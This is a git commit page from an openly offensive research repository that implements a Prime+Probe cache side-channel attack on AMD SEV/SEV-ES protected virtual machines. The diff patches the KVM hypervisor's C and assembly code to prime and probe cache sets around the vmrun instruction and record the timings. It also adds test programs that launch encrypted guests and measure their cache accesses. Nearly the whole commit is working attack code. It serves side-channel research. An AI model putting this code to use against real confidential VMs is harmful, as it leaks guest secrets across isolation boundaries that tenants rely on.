cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 0a23cb0a512c3984aa0d68f4ec4a5c0c0d55a430
parent 29054b8937435a4e736d14b26329eafc759eb152
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  1 Sep 2022 23:53:36 +0200

sev-es: Fixed OOM symptom, prime & probe working (but not directly around vmrun yet)

Diffstat:
M.gitignore | 1+
Mpatch.diff | 241+++++++++++++++++++++++++++++++++++++++++++++++--------------------------------
Mtest/.gitignore | 2++
Mtest/sev-es.c | 125++++++++++++++++++++++++++++++++++++-------------------------------------------
Mtest/sev.c | 2+-
5 files changed, 204 insertions(+), 167 deletions(-)

diff --git a/.gitignore b/.gitignore @@ -4,3 +4,4 @@ push.sh *.o.cmd *.o *.out +*.swp diff --git a/patch.diff b/patch.diff @@ -31,8 +31,25 @@ index b804444e16d4..17167ccfca22 100644 obj-$(CONFIG_KVM) += kvm.o obj-$(CONFIG_KVM_INTEL) += kvm-intel.o +diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c +index 87e1c66228f7..d7da36e12da6 100644 +--- a/arch/x86/kvm/svm/sev.c ++++ b/arch/x86/kvm/svm/sev.c +@@ -572,10 +572,12 @@ static int sev_launch_update_vmsa(struct kvm *kvm, struct kvm_sev_cmd *argp) + struct vcpu_svm *svm = to_svm(kvm->vcpus[i]); + + /* Perform some pre-encryption checks against the VMSA */ ++ printk(KERN_WARNING "Vincent: Pre sev_es_sync_vmsa\n"); + ret = sev_es_sync_vmsa(svm); + if (ret) + goto e_free; + ++ printk(KERN_WARNING "Vincent: Post sev_es_sync_vmsa\n"); + /* + * The LAUNCH_UPDATE_VMSA command will perform in-place + * encryption of the VMSA memory content (i.e it will write diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c -index 7b3cfbe8f7e3..cb60859f7d17 100644 +index 7b3cfbe8f7e3..c7952eab7c6d 100644 --- a/arch/x86/kvm/svm/svm.c +++ b/arch/x86/kvm/svm/svm.c @@ -2,6 +2,8 @@ @@ -44,9 +61,30 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644 #include "irq.h" #include "mmu.h" #include "kvm_cache_regs.h" -@@ -3751,7 +3753,14 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, +@@ -3131,7 +3133,7 @@ static void dump_vmcb(struct kvm_vcpu *vcpu) + + if (!dump_invalid_vmcb) { + pr_warn_ratelimited("set kvm_amd.dump_invalid_vmcb=1 to dump internal KVM state.\n"); +- return; ++ // return; + } + + pr_err("VMCB Control Area:\n"); +@@ -3749,9 +3751,26 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, + lockdep_hardirqs_on(CALLER_ADDR0); + if (sev_es_guest(svm->vcpu.kvm)) { ++ memset(cachepc_msrmts, 0, 64 * 2); ++ int cpu = get_cpu(); ++ local_irq_disable(); ++ WARN_ON(cpu != 2); ++ cacheline *next; ++ next = cachepc_prime(cachepc_ds); __svm_sev_es_vcpu_run(svm->vmcb_pa); ++ cachepc_probe(next); ++ cachepc_save_msrmts(cachepc_ds); ++ local_irq_enable(); ++ put_cpu(); } else { + memset(cachepc_msrmts, 0, 64 * 2); + int cpu = get_cpu(); @@ -59,7 +97,7 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644 #ifdef CONFIG_X86_64 native_wrmsrl(MSR_GS_BASE, svm->host.gs_base); -@@ -3785,8 +3794,12 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, +@@ -3785,8 +3804,12 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) { @@ -73,11 +111,20 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644 svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX]; svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP]; svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP]; +@@ -3888,7 +3911,7 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) + + svm->vmcb->control.tlb_ctl = TLB_CONTROL_DO_NOTHING; + vmcb_mark_all_clean(svm->vmcb); +- ++ printk(KERN_WARNING "Vincent: svm->vmcb exit code %d\n", svm->vmcb->control.exit_code); + /* if exit due to PF check for async PF */ + if (svm->vmcb->control.exit_code == SVM_EXIT_EXCP_BASE + PF_VECTOR) + svm->vcpu.arch.apf.host_apf_flags = diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S -index 6feb8c08f45a..2f259db92037 100644 +index 6feb8c08f45a..eb0ea02ef187 100644 --- a/arch/x86/kvm/svm/vmenter.S +++ b/arch/x86/kvm/svm/vmenter.S -@@ -27,14 +27,53 @@ +@@ -27,14 +27,74 @@ #define VCPU_R15 __VCPU_REGS_R15 * WORD_SIZE #endif @@ -94,44 +141,65 @@ index 6feb8c08f45a..2f259db92037 100644 +.endm + +.macro swap_xmm grp xmm -+ vmovq \grp, %xmm1 ++ vmovq \grp, %xmm15 + vmovq \xmm, \grp -+ vmovq %xmm1, \xmm ++ vmovq %xmm15, \xmm +.endm + -+.macro barrier -+ mfence -+ mov $0x80000005,%eax -+ cpuid -+.endm -+ - /** - * __svm_vcpu_run - Run a vCPU via a transition to SVM guest mode - * @vmcb_pa: unsigned long - * @regs: unsigned long * (to guest registers) - */ - SYM_FUNC_START(__svm_vcpu_run) -+ /* store regs in zmm */ ++.macro push_all + push_xmm %rax, %xmm0 ++ push_xmm %rbx, %xmm1 + push_xmm %rcx, %xmm2 + push_xmm %rdx, %xmm3 + push_xmm %rbp, %xmm4 + push_xmm %rsp, %xmm5 + push_xmm %rdi, %xmm6 + push_xmm %rsi, %xmm7 -+ push_xmm %r8, %xmm8 -+ push_xmm %r9, %xmm9 ++ push_xmm %r8, %xmm8 ++ push_xmm %r9, %xmm9 + push_xmm %r10, %xmm10 + push_xmm %r11, %xmm11 + push_xmm %r12, %xmm12 + push_xmm %r13, %xmm13 + push_xmm %r14, %xmm14 -+ push_xmm %r15, %xmm15 ++.endm ++ ++.macro swap_all ++ swap_xmm %rax, %xmm0 ++ swap_xmm %rbx, %xmm1 ++ swap_xmm %rcx, %xmm2 ++ swap_xmm %rdx, %xmm3 ++ swap_xmm %rbp, %xmm4 ++ swap_xmm %rsp, %xmm5 ++ swap_xmm %rdi, %xmm6 ++ swap_xmm %rsi, %xmm7 ++ swap_xmm %r8, %xmm8 ++ swap_xmm %r9, %xmm9 ++ swap_xmm %r10, %xmm10 ++ swap_xmm %r11, %xmm11 ++ swap_xmm %r12, %xmm12 ++ swap_xmm %r13, %xmm13 ++ swap_xmm %r14, %xmm14 ++.endm ++ ++.macro barrier ++ mfence ++ mov $0x80000005,%eax ++ cpuid ++.endm ++ + /** + * __svm_vcpu_run - Run a vCPU via a transition to SVM guest mode + * @vmcb_pa: unsigned long + * @regs: unsigned long * (to guest registers) + */ + SYM_FUNC_START(__svm_vcpu_run) ++ push_all + push %_ASM_BP #ifdef CONFIG_X86_64 push %r15 -@@ -45,6 +84,7 @@ SYM_FUNC_START(__svm_vcpu_run) +@@ -45,6 +105,7 @@ SYM_FUNC_START(__svm_vcpu_run) push %edi push %esi #endif @@ -139,96 +207,34 @@ index 6feb8c08f45a..2f259db92037 100644 push %_ASM_BX /* Save @regs. */ -@@ -85,8 +125,87 @@ SYM_FUNC_START(__svm_vcpu_run) +@@ -85,8 +146,25 @@ SYM_FUNC_START(__svm_vcpu_run) jne 3f ud2 _ASM_EXTABLE(1b, 2b) + +3: -+ swap_xmm %rax, %xmm0 -+ swap_xmm %rcx, %xmm2 -+ swap_xmm %rdx, %xmm3 -+ swap_xmm %rbp, %xmm4 -+ swap_xmm %rsp, %xmm5 -+ swap_xmm %rdi, %xmm6 -+ swap_xmm %rsi, %xmm7 -+ swap_xmm %r8, %xmm8 -+ swap_xmm %r9, %xmm9 -+ swap_xmm %r10, %xmm10 -+ swap_xmm %r11, %xmm11 -+ swap_xmm %r12, %xmm12 -+ swap_xmm %r13, %xmm13 -+ swap_xmm %r14, %xmm14 -+ swap_xmm %r15, %xmm15 -+ ++ swap_all + mov cachepc_ds, %rsi + mov 0x8(%rsi), %r15 -+ -+ lea prime_ret(%rip), %rdi ++ lea sev_prime_ret(%rip), %rdi + jmp cachepc_prime_vcall+1 // skip stack pushes -+prime_ret: -+ -+ swap_xmm %rax, %xmm0 -+ swap_xmm %rcx, %xmm2 -+ swap_xmm %rdx, %xmm3 -+ swap_xmm %rbp, %xmm4 -+ swap_xmm %rsp, %xmm5 -+ swap_xmm %rdi, %xmm6 -+ swap_xmm %rsi, %xmm7 -+ swap_xmm %r8, %xmm8 -+ swap_xmm %r9, %xmm9 -+ swap_xmm %r10, %xmm10 -+ swap_xmm %r11, %xmm11 -+ swap_xmm %r12, %xmm12 -+ swap_xmm %r13, %xmm13 -+ swap_xmm %r14, %xmm14 -+ swap_xmm %r15, %xmm15 -+ ++sev_prime_ret: ++ swap_all ++ + vmrun %_ASM_AX + -+ swap_xmm %rax, %xmm0 -+ swap_xmm %rcx, %xmm2 -+ swap_xmm %rdx, %xmm3 -+ swap_xmm %rbp, %xmm4 -+ swap_xmm %rsp, %xmm5 -+ swap_xmm %rdi, %xmm6 -+ swap_xmm %rsi, %xmm7 -+ swap_xmm %r8, %xmm8 -+ swap_xmm %r9, %xmm9 -+ swap_xmm %r10, %xmm10 -+ swap_xmm %r11, %xmm11 -+ swap_xmm %r12, %xmm12 -+ swap_xmm %r13, %xmm13 -+ swap_xmm %r14, %xmm14 -+ swap_xmm %r15, %xmm15 -+ ++ swap_all + mov %r15, %rsi -+ lea probe_ret(%rip), %rdi ++ lea sev_probe_ret(%rip), %rdi + jmp cachepc_probe_vcall+6 // skip stack pushs -+probe_ret: -+ -+ swap_xmm %rax, %xmm0 -+ swap_xmm %rcx, %xmm2 -+ swap_xmm %rdx, %xmm3 -+ swap_xmm %rbp, %xmm4 -+ swap_xmm %rsp, %xmm5 -+ swap_xmm %rdi, %xmm6 -+ swap_xmm %rsi, %xmm7 -+ swap_xmm %r8, %xmm8 -+ swap_xmm %r9, %xmm9 -+ swap_xmm %r10, %xmm10 -+ swap_xmm %r11, %xmm11 -+ swap_xmm %r12, %xmm12 -+ swap_xmm %r13, %xmm13 -+ swap_xmm %r14, %xmm14 -+ swap_xmm %r15, %xmm15 -+ ++sev_probe_ret: ++ swap_all -3: vmrun %_ASM_AX jmp 5f 4: cmpb $0, kvm_rebooting jne 5f -@@ -100,7 +219,7 @@ SYM_FUNC_START(__svm_vcpu_run) +@@ -100,7 +178,7 @@ SYM_FUNC_START(__svm_vcpu_run) ud2 _ASM_EXTABLE(5b, 6b) 7: @@ -237,7 +243,7 @@ index 6feb8c08f45a..2f259db92037 100644 #ifdef CONFIG_RETPOLINE /* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */ -@@ -166,6 +285,11 @@ SYM_FUNC_START(__svm_vcpu_run) +@@ -166,6 +244,11 @@ SYM_FUNC_START(__svm_vcpu_run) pop %edi #endif pop %_ASM_BP @@ -249,6 +255,45 @@ index 6feb8c08f45a..2f259db92037 100644 ret SYM_FUNC_END(__svm_vcpu_run) +@@ -174,6 +257,8 @@ SYM_FUNC_END(__svm_vcpu_run) + * @vmcb_pa: unsigned long + */ + SYM_FUNC_START(__svm_sev_es_vcpu_run) ++ push_all ++ + push %_ASM_BP + #ifdef CONFIG_X86_64 + push %r15 +@@ -190,7 +275,28 @@ SYM_FUNC_START(__svm_sev_es_vcpu_run) + mov %_ASM_ARG1, %_ASM_AX + sti + +-1: vmrun %_ASM_AX ++1: ++ ++// swap_all ++// mov cachepc_ds, %rsi ++// mov 0x8(%rsi), %r15 ++// lea sev_es_prime_ret(%rip), %rdi ++// jmp cachepc_prime_vcall+1 // skip stack pushes ++//sev_es_prime_ret: ++// swap_all ++ ++// // TEST r15 dependance ++// movq $0x41414141, %r15 ++ ++ vmrun %_ASM_AX ++ ++// swap_all ++// mov %r15, %rsi ++// lea sev_es_probe_ret(%rip), %rdi ++// jmp cachepc_probe_vcall+6 // skip stack pushs ++//sev_es_probe_ret: ++// swap_all ++ + jmp 3f + 2: cmpb $0, kvm_rebooting + jne 3f diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c index 4097d028c3ab..81685bd567a2 100644 --- a/arch/x86/kvm/x86.c diff --git a/test/.gitignore b/test/.gitignore @@ -2,3 +2,5 @@ access eviction kvm sev +sev-es +sev-snp diff --git a/test/sev-es.c b/test/sev-es.c @@ -40,7 +40,7 @@ #define TARGET_SET 15 struct kvm { - int fd, vmfd, vcpufd; + int vmfd, vcpufd; void *mem; size_t memsize; struct kvm_run *run; @@ -130,8 +130,8 @@ vm_guest_with(void) while (1) { asm volatile("mov (%[v]), %%bl" : : [v] "r" (TARGET_CACHE_LINESIZE * TARGET_SET)); - asm volatile("out %%al, (%%dx)" : : ); - //asm volatile("hlt"); + //asm volatile("out %%al, (%%dx)" : : ); + asm volatile("hlt"); //asm volatile("rep; vmmcall\n\r"); } } @@ -140,8 +140,8 @@ __attribute__((section("guest_without"))) void vm_guest_without(void) { while (1) { - //asm volatile("hlt"); - asm volatile("out %%al, (%%dx)" : : ); + asm volatile("hlt"); + //asm volatile("out %%al, (%%dx)" : : ); } } @@ -264,7 +264,7 @@ sev_guest_state(int vmfd, uint32_t handle) } void -sev_debug_encrypt(int vmfd, void *src, void *dst, size_t size) +sev_dbg_encrypt(int vmfd, void *dst, void *src, size_t size) { struct kvm_sev_dbg enc; int ret, fwerr; @@ -278,7 +278,7 @@ sev_debug_encrypt(int vmfd, void *src, void *dst, size_t size) } void -sev_debug_decrypt(int vmfd, void *src, void *dst, size_t size) +sev_dbg_decrypt(int vmfd, void *dst, void *src, size_t size) { struct kvm_sev_dbg enc; int ret, fwerr; @@ -329,24 +329,10 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop) if (ret < 0) errx(1, "KVM_SEV_ES_INIT: (%s) %s", strerror(errno), sev_fwerr_str(fwerr)); - /* Generate encryption keys and set policy */ - memset(&start, 0, sizeof(start)); - start.handle = 0; - start.policy = 1 << 2; /* require ES */ - ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_START, &start, &fwerr); - if (ret < 0) errx(1, "KVM_SEV_LAUNCH_START: (%s) %s", - strerror(errno), sev_fwerr_str(fwerr)); - - - - - - - - /* Create virtual cpu */ kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0); if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU"); + /* Map the shared kvm_run structure and following data */ ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL); if (ret < 0) err(1, "KVM_GET_VCPU_MMAP_SIZE"); @@ -355,8 +341,8 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop) kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE, MAP_SHARED, kvm->vcpufd, 0); if (!kvm->run) err(1, "mmap vcpu"); - - /* Initialize segment regs */ + + /* Initialize segment regs */ memset(&sregs, 0, sizeof(sregs)); ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs); if (ret < 0) err(1, "KVM_GET_SREGS"); @@ -364,46 +350,46 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop) sregs.cs.selector = 0; ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs); if (ret < 0) err(1, "KVM_SET_SREGS"); - - /* Initialize rest of registers */ + + /* Initialize rest of registers */ memset(&regs, 0, sizeof(regs)); - regs.rip = 0x0; - regs.rsp = kvm->memsize - 1; - regs.rbp = kvm->memsize - 1; - regs.rax = 0; - regs.rdx = 0; - regs.rflags = 0x2; + regs.rip = 0; + regs.rsp = kvm->memsize - 8; + regs.rbp = kvm->memsize - 8; ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs); if (ret < 0) err(1, "KVM_SET_REGS"); - /* Prepare the vm memory (by encrypting it) */ + + /* Generate encryption keys and set policy */ + memset(&start, 0, sizeof(start)); + start.handle = 0; + start.policy = 1 << 2; /* require ES */ + ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_START, &start, &fwerr); + if (ret < 0) errx(1, "KVM_SEV_LAUNCH_START: (%s) %s", + strerror(errno), sev_fwerr_str(fwerr)); + + /* Prepare the vm memory (by encrypting it) */ memset(&update, 0, sizeof(update)); update.uaddr = (uintptr_t) kvm->mem; update.len = ramsize; ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_UPDATE_DATA, &update, &fwerr); if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_DATA: (%s) %s", strerror(errno), sev_fwerr_str(fwerr)); - + /* Prepare the vm save area */ ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_UPDATE_VMSA, NULL, &fwerr); - if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_VMSA: (%s) %s", - strerror(errno), sev_fwerr_str(fwerr)); - /* Collect a measurement (necessary) */ - msrmt = sev_get_measure(kvm->vmfd); + if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_VMSA: (%s) %s",strerror(errno), sev_fwerr_str(fwerr)); + + /* Collect a measurement (necessary) */ + msrmt = sev_get_measure(kvm->vmfd); free(msrmt); + /* Finalize launch process */ ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_FINISH, 0, &fwerr); if (ret < 0) errx(1, "KVM_SEV_LAUNCH_FINISH: (%s) %s", - strerror(errno), sev_fwerr_str(fwerr)); + strerror(errno), sev_fwerr_str(fwerr)); ret = sev_guest_state(kvm->vmfd, start.handle); if (ret != GSTATE_RUNNING) errx(1, "Bad guest state: %s", sev_gstate_str(fwerr)); - - - - - - - } void @@ -449,36 +435,26 @@ print_counts(uint16_t *counts) } uint16_t * -collect(const char *prefix, void *code_start, void *code_stop) +collect(struct kvm *kvm) { struct kvm_regs regs; - struct kvm kvm; - uint16_t *counts; int ret; - sev_kvm_init(&kvm, 64 * 64 * 8 * 2, code_start, code_stop); - - /* run vm twice, use count without initial stack setup */ - ret = ioctl(kvm.vcpufd, KVM_RUN, NULL); - ret = ioctl(kvm.vcpufd, KVM_RUN, NULL); + ret = ioctl(kvm->vcpufd, KVM_RUN, NULL); if (ret < 0) err(1, "KVM_RUN"); - if (kvm.run->exit_reason == KVM_EXIT_MMIO) { + if (kvm->run->exit_reason == KVM_EXIT_MMIO) { memset(&regs, 0, sizeof(regs)); - ret = ioctl(kvm.vcpufd, KVM_GET_REGS, &regs); + ret = ioctl(kvm->vcpufd, KVM_GET_REGS, &regs); if (ret < 0) err(1, "KVM_GET_REGS"); - errx(1, "Victim access OOB: %llu %08llx => %02X\n", - kvm.run->mmio.phys_addr, regs.rip, - ((uint8_t *)kvm.mem)[regs.rip]); - } else if (kvm.run->exit_reason != KVM_EXIT_IO) { - errx(1, "KVM died: %i\n", kvm.run->exit_reason); + errx(1, "KVM_EXTI_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n", + kvm->run->mmio.is_write ? "write" : "read", + kvm->run->mmio.phys_addr, regs.rip); + } else if (kvm->run->exit_reason != KVM_EXIT_HLT) { + errx(1, "KVM died: %i\n", kvm->run->exit_reason); } - counts = read_counts(); - - sev_kvm_deinit(&kvm); - - return counts; + return read_counts(); } int @@ -486,6 +462,7 @@ main(int argc, const char **argv) { uint16_t without_access[SAMPLE_COUNT][64]; uint16_t with_access[SAMPLE_COUNT][64]; + struct kvm kvm_without_access, kvm_with_access; uint16_t *counts, *baseline; uint32_t arg; int i, k, ret; @@ -518,12 +495,21 @@ main(int argc, const char **argv) for (k = 0; k < 64; k++) baseline[k] = UINT16_MAX; + sev_kvm_init(&kvm_with_access, 64 * 64 * 8 * 2, __start_guest_with, __stop_guest_with); + sev_kvm_init(&kvm_without_access, 64 * 64 * 8 * 2, __start_guest_without, __stop_guest_without); + + /* one run to get into while loop (after stack setup) */ + ioctl(kvm_with_access.vcpufd, KVM_RUN, NULL); + ioctl(kvm_without_access.vcpufd, KVM_RUN, NULL); + for (i = 0; i < SAMPLE_COUNT; i++) { - counts = collect("without", __start_guest_without, __stop_guest_without); + //printf("Running guest without\n"); + counts = collect(&kvm_without_access); memcpy(without_access[i], counts, 64 * sizeof(uint16_t)); free(counts); - counts = collect("with", __start_guest_with, __stop_guest_with); + //printf("Running guest with\n"); + counts = collect(&kvm_with_access); memcpy(with_access[i], counts, 64 * sizeof(uint16_t)); free(counts); @@ -551,6 +537,9 @@ main(int argc, const char **argv) //assert(without_access[i][TARGET_SET] == 0); } + sev_kvm_deinit(&kvm_with_access); + sev_kvm_deinit(&kvm_without_access); + free(baseline); close(cachepc_dev); diff --git a/test/sev.c b/test/sev.c @@ -357,7 +357,7 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop) if (ret != GSTATE_RUNNING) errx(1, "Bad guest state: %s", sev_gstate_str(fwerr)); - /* Create virtual cpu */ + /* Create virtual cpu core */ kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0); if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");